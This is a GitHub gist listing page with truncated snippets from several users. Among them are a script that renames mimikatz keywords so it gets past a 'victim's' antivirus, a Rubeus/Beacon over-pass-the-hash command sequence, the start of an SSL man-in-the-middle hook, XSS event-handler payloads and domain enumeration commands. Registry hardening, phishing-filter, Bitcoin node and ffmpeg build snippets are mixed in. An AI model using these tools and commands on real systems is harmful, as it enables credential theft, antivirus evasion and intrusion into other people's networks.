Skip to content

Instantly share code, notes, and snippets.

View glen-testing's full-sized avatar

Glen Saunders glen-testing

7 followers · 22 following
View GitHub Profile
@imaibou
imaibou / mimikatz_obfuscator.sh
Last active June 24, 2025 11:18
Mimikatz Obfuscator
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "[email protected]" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/windows
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'
@imaibou
imaibou / html_test.html
Created December 15, 2016 18:04 — forked from rwestergren/html_test.html
HTML Email Filter Test
<a onafterprint="console.log(244599)" onbeforeprint="console.log(309354)" onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)" onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)" ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)" onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)" onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)" oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)" oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)" onselect="console.log(942035)" onsubmit="console.log(603589)" onkeydown="console.log(650647)" onkeypress="console.log(579383)" onkeyup="console.log(821763)" onclick="console.log(284098)" ondblclick="console.log(477370)" ondrag="console.log(439095)" ondragend="console.log(546684)" o
@mks-m
mks-m / fullnode.md
Last active November 13, 2023 14:26 — forked from romanz/fullnode.md
Bitcoin Full Node on AWS Free Tier

Bitcoin Full Node on AWS Free Tier

Provisioning

  • Launch one T2 micro instance, using Ubuntu 14.04 LTS AMI.
  • Open SSH and Bitcoin Protocol TCP ports: 22, 8333.
  • Attach 150GB EBS (General-Purpose SSD) volume for blockchain storage to /dev/sdf.

The pricing would be ~$15/month. See here for more details.

@wdormann
wdormann / disable_ddeauto.reg
Last active October 1, 2024 17:10
Disable DDEAUTO for Outlook, Word, OneNote, and Excel versions 2010, 2013, 2016
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options]
"DontUpdateLinks"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Options]
"DontUpdateLinks"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options]
"DontUpdateLinks"=dword:00000001
@wdormann
wdormann / enable_bottom-up_ASLR.reg
Created November 16, 2017 17:52
Enable both Mandatory ASLR *and* Bottom-up ASLR system-wide
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\kernel]
"MitigationOptions"=hex:00,01,01,00,00,00,00,00,00,00,00,00,00,00,00,00
anonymous
anonymous / memMITM.cpp
Created December 19, 2017 00:23
SSL MITM PoC - Hook sspicli!EncryptMessage
#define SECURITY_WIN32 //Define First Before Imports.
#include <windows.h>
#include <stdio.h>
#include <Sspi.h> //Be sure to reference secur32.lib in Linker | Input | Additional Dependencies
FARPROC fpEncryptMessage; //Pointer To The Original Location
BYTE bSavedByte; //Saved Byte Overwritten by 0xCC -
@its-a-feature
its-a-feature / Domain Enumeration Commands
Created January 7, 2018 21:03
Common Domain Enumeration commands in Windows, Mac, and LDAP
Domain: TEST.local
User Enumeration:
Windows:
net user
net user /domain
net user [username]
net user [username] /domain
wmic useraccount
Mac:
dscl . ls /Users
@johnie
johnie / README.md
Last active January 25, 2024 16:23
Filter Phish – This Google Apps Scripts filter will automatically move all future emails with the header `X-PHISHTEST` to trash.

Filter Phish

This Google Apps Scripts filter will automatically move all future emails with the header X-PHISHTEST to trash.

Getting started

  1. Go to Google Apps Script
  2. Add a new script and copy paste the content from the sibling file
  3. Test run the script, go to View in the menu bar and click Logs
  • If there's no errors it should be blank, OR a verbose message that it removed a phishing email.
@its-a-feature
its-a-feature / gist:399ad86b2c8e5032207a65af8b6858ff
Created October 25, 2018 22:03 — forked from HarmJ0y/gist:dc379107cfb4aa7ef5c3ecbac0133a02
Over-pass-the-hash with Rubeus and Beacon
# grab a TGT b64 blob with a valid NTLM
beacon> execute-assembly /home/specter/Rubeus_4.5.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
# inject the .kirbi
@talkingnews
talkingnews / ffmpeg_build.sh
Last active August 21, 2024 17:52 — forked from iJackUA/ffmpeg_build.sh
Build ffmpeg and all needed codecs from latest git revisions
#!/bin/bash
sudo apt-get update -qq && sudo apt-get -y install \
autoconf \
automake \
build-essential \
cmake \
git-core \
libass-dev \
libfreetype6-dev \